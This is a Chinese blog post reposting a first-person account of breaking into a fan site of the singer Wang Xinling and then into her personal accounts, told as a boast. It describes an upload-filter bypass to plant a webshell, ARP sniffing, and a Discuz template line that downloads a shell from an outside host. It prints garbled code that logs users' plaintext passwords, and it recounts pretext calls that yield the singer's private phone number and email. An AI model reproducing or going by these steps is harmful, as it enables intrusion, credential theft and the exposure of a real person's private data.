引言

最近娱乐节目《成风破浪》开播了，作为技术宅的我本不会去关注这种娱乐节目，但是突然有一天在热搜上看到了我学生时代的偶像之一王心凌上了热搜，于是就回过去看了一下到底发生了什么事情。看完才知道了事情的原委，其实作为一个80末90初的人来说吧，上学的时候有很多的歌曲是收音机、MP3、磁带机反复听的歌，其中就有王心凌的歌，这确实是我们那一代的偶像之一，所以才会有如今这一大批的 “中年粉” 蜂拥而至，作为技术宅的我，想起了以前3EST站长Mars的那篇经典之作，《对王心凌的一次渗透》，特地翻了一下硬盘，找了出来，重温一下社工的魅力

也不知道从什么时候开始，年龄也逐渐的由奔2到奔3，再由奔3转到了奔4上面去了，时间努力的往前跑，能留下青春的只剩下了回忆。

正文

记得那是2002年的第一场雪....

前几天，听说Cyndi出新专辑了，哥好激动啊..  

听了几天Music突然萌发了个思想！想了解更多的有关于她的资料，下面一出好戏即将上演！

总共有三个步骤 ：1.先分析 2.再踩点 3.最后渗透

拿到一个目标要先学会分析，首先Cyndi是位明星，所以利用搜索引擎是不可能搜索到什么有价值的信息.

一般明星在网络上都有自己的Fans基地，好吧.目标已经确定了！

通过百度搜索到一个她留言过的Fans基地www.CyndiFans.net

既然目标确定了，该执行第二步了。去 ip.3est.com 反查询一下它所在的服务器上还有其他站点没！查询结果如下:

大概看了下，基本都采用 Dz7.0 + Uchome + SiteSuper7.5 组合!

手里又没0day，所以没抱有太大希望。只好采用ARP方式来看看能获得什么有价值的信息，首先得先获得C段一台服务器权限，拿出平时常用的 Hscan 来扫描一下有C段没有Ftp弱口令。

悲剧了！竟然一个没扫出来。接着用IIS利用工具扫描下C段，记录装有IIS6.0的服务器IP。

因为他的IP是 xx.xx.xx.154 大多数情况是1或者129作为网关，叫前C段和后C段，154距离129比较，所以目标放在129-255之间！

然后进入cn.bing.com输入ip:xx.xx.xx.xx 搜索下后C段装有IIS6.0的服务器IP 看看有什么站，一般各类型网站多的的就是虚拟主机，排除掉这些，就剩下2台主机了..

汗 真郁闷..那么集中精力看看其中一台xx人才网，wwwscan扫描下没扫描到有价值东西，进入网站转悠了半天，

在他的分站点了个图片属性，路径是ewe我猜想了下应该是Ewebeditor这个编辑器，输入ewe/admin/admin_login.asp发现后台被删了，数据库是默认的先下载下来看看有没有被人搞过，结果失望了，运气不怎么好..

先休息下再搞了.. 去群里聊了会天，过几个小时，来了精神。

继续在它的网站转悠，我觉得问题最多的还是上传的地方，就注册了个会员。进入管理中心没有发现什么上传的位置，接着又注册了个企业会员，发现了个上传企业照片的地方，把小马改成1.asp;.jpg格式结果上传成功了，没提示路径，用抓包工具看一下，总算见到可爱的小马..

（这是一张小马的图片，年久失修，不见了，大家意会即可）

拿到webshell之后，开始提权，结果那破服务器慢的要死。开个高速VPN，速度果然提升了。随便看了下感觉提权无望，基本组建都被卸载了，目录还不能查看，有SU不过是9.1版本没溢出漏洞。

唉 权限配置的很死，看来管理员挺懂安全啊。

看了下配置文件最后发现个sa，哈哈 激动死了！直接加系统用户拿到服务器权限。然后更变态的事情发生了，进去看任务管理器竟然CPU100%总共运行72个进程..

我的天啊，这么破烂的服务器一ARP不就挂掉了。我一个一个把没用的进程结束掉，到30个进程了，在结束服务器就挂了.

然后打开我的电脑管理想看看这服务器是什么高级配置，结果点了属性Shell32.dl被禁，进C盘弹出拒绝访问..打开网页不让下载东西..

一系列的问题皆然发生！终于把Cain放到服务器了。

还好不出我所预料，这个服务器网关是129。 

哈哈只能扫到后C段的服务器Mac .

然后开始ARP 154这个主机，嗅探开始了。他服务器装有ARP防火墙软件把发送的数据给拦截了..

这时候想起玫瑰的ARP突破方法，结果试验了下没成功，后来配合幻境网盾用了下。

成功欺骗突破防火墙.终于嗅探到数据了,

挺高兴的，结果5秒钟都没，Cain卡爆了！服务器挂了10分钟我才登录上。发现嗅探到的3万多个Http信息竟然都是盛大传奇的,

我纳闷了会，地址确实是盛大的!

看了下mssql嗅探到了几个SA密码，接着又拿下一台速度比较好点的服务器，接着刚才的工作，开始ARP。

我在网站找到管理员的QQ加了他。

我:
你好！请问你是cyndifans.net的管理么 ？
ＮiＫai:
恩
我：
我的账户丢失了怎么办 能帮我找回下么 ？
ＮiＫai:
请问你用户名是？
我:
christa
ＮiＫai :
请使用找回密码功能http://www.cyndifans.net/logging.php?action=login
我:
我以前的电子邮件过期了.
ＮiＫai:
能否告诉我你的注册时间和最后登录时间?
我:
记不起来了。。
ＮiＫai:
大概的
ＮiＫai:
还有电子邮件地址是什么?
ＮiＫai:
邮件地址
我:
以前注册的[email protected]好像是163还是126..记不大清楚了!
ＮiＫai:
什么时候发现不能登录或者发现忘记密码的?
我: (PS:其实我啥信息没有!去论坛看见个账户就随便说的.快露馅 该转移话题了!)
对了!请问那个会员卡有什么作用 ? 能了解心凌最新消息？
ＮiＫai :
凌盟永久会员
可以通过短信等方式获取最新消息
以及更多特权和购买专辑等优惠
还有参与活动等优先权
我:
哦~没什么别的待遇么。。能得到签名么
ＮiＫai：
预购专辑有签名啊
ＮiＫai：
重置密码为：123456 登录后尽快修改密码！
我：(PS:哈哈 像想让我快点加入会员！我就不加气死你!)
嗯 麻烦你了
ＮiＫai：
你要买吗？会员卡 年后会提价年后价格应该在50-68元之间!
我：
我没办理网上银行。。
ＮiＫai：
可以银行转账
ＮiＫai：
我可以给你账号
我：
嗯，好的!
ＮiＫai：
中国工商银行上海市新灵路支行
受款帐号：10011XXXXX21135XXXX
户名：XXX
http://www.xxx.com/abouts/payment.php
银行汇款（到账时间部分实时，部分1-5工作日）
我：
好的 我打的时候联系下你
ＮiＫai：
好的!
我：
麻烦了。

成功嗅探到管理员的登录密码.接着进入后台

在模板任意位置插入
{eval copy('http://www.3est.com/mars.txt', DISCUZ_ROOT.'./forumdata/shell.php');
然后更新缓存.结果他的缓存目录竟然无写入权限

没办法了
在后台查看了Cyndi的注册资料和最后登录IP地址。

IP138查一下是台湾的.这差不多就是她家IP了，光拿到这个还不够，继续渗透主要是拿Cyndi的密码，那只有Webshell或者服务器权限的情况下才能拿下数据库，这是一件比较难的差事。

ARP到3389登录密码成功率很低的，只嗅探Ftp Mysql RDP ，过了2天嗅探出FTP了

成功登录FTP之后，传个webshell

结果服务器权限很死，ping 下是su8的FTP，然后通过 空虚浪子心 写的EXP提到服务器！然后BT的事情出现了。

C盘没访问权限，打开属性提升用户组

这个服务器安全做的不错，一堆东西没权限运行。既然这样，在看看注册表是否被封锁了。什么都不让下载，更别说复制了。只能靠WebShell上传个cmd.exe来克隆下超级管理。

至此，第一阶段渗透完毕！

去数据库找王心凌密码，DZ采用的是salt方式，随机获得一个字符串，然后把明文密码MD5之后，再与随机字符串连接起来之后，再次MD5。这样可极大的提高安全系数。只好在记录明文密码了。
修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上代码,在网站admin目录下生成include.txt

ip=_SERVER['REMOTE_ADDR'];

$showtime=date("Y-m-d H:i:s");

record="".record="".username." --------".password." IP:".password."IP:".ip." Time:".$showtime."\r\n";

$handle=fopen('./admin/include.txt','a+');

write=fwrite(write=fwrite(handle,$record);

等着王心凌上论坛，下面做其他工作，先抓取下管理的Hash。

跑出密码！继续把服务器数据库连接密码，缓存密码，FTP密码都收集下！
去ip866查询域名的注册邮箱是[email protected]，然后反查下出现了Cyndi.com.cn这个域名，让我感到****了。

先看看他域名注册的地方，一个是新网，一个是万网，先解决新网的，百度搜索了下他的信息很散，不过经过一下午的搜索基本信息已经确定。

接着试了几个密码进来了。

很快，把所有密码整理下，然后猜想下就出来了。

继续搜索资料，找DNS管理页面

然后社工到QQ密码，然后进入QQ网络硬盘，找有价值信息，成功拿到cyndi.com.cn管理权限。经过收集资料，在百度贴吧找到她ID，搜狐BLOG 台湾雅虎BLOG，经过调查发现那个搜狐BLOG是她的经纪人帮她发的，只有翻墙去台湾BLOG。

2010-1-13 20:25
收集了点资料，
1、起初为了社工心凌创办的经济公司的EMAIL，依靠的是雅虎订阅信息得到EMAIL，然后通过找回密码，密码问题是她姓名，更何况我又不知道她是谁，与他们公司的关系及职位，我猜想，他们公司人数不会太多，估计也就两三个。
2、百度找到他们公司电话，打过去，然后说，请问您的贵姓 接着一个女的说 ？好甜美的话语啊，我于是蠢蠢欲动了几秒，接着说，女士您贵姓，她说姓米，我说 米小姐，请问怎么能够拿到心凌的签名，她给我了个电话让我联系一个唱片公司。接着挂电话了
3、过半天之后 再打电话给她经济公司，说请问张XX小姐在么？
4、我听了语音，是另外个女的接的电话，她说请问你是不是找张小姐，接着找个借口挂了电话！
5、然后登录Email通过密码提示找回密码，输入姓名，成功进入！
进入邮箱打开通讯录，拿到了本人的手机，王心凌的私人EMAIL和手机，然后这个密码正好是她EMAIL的。。就不截图了，免的被人破坏。
渗透结束！有时间找她聊聊哈。

社会工程学YYDS~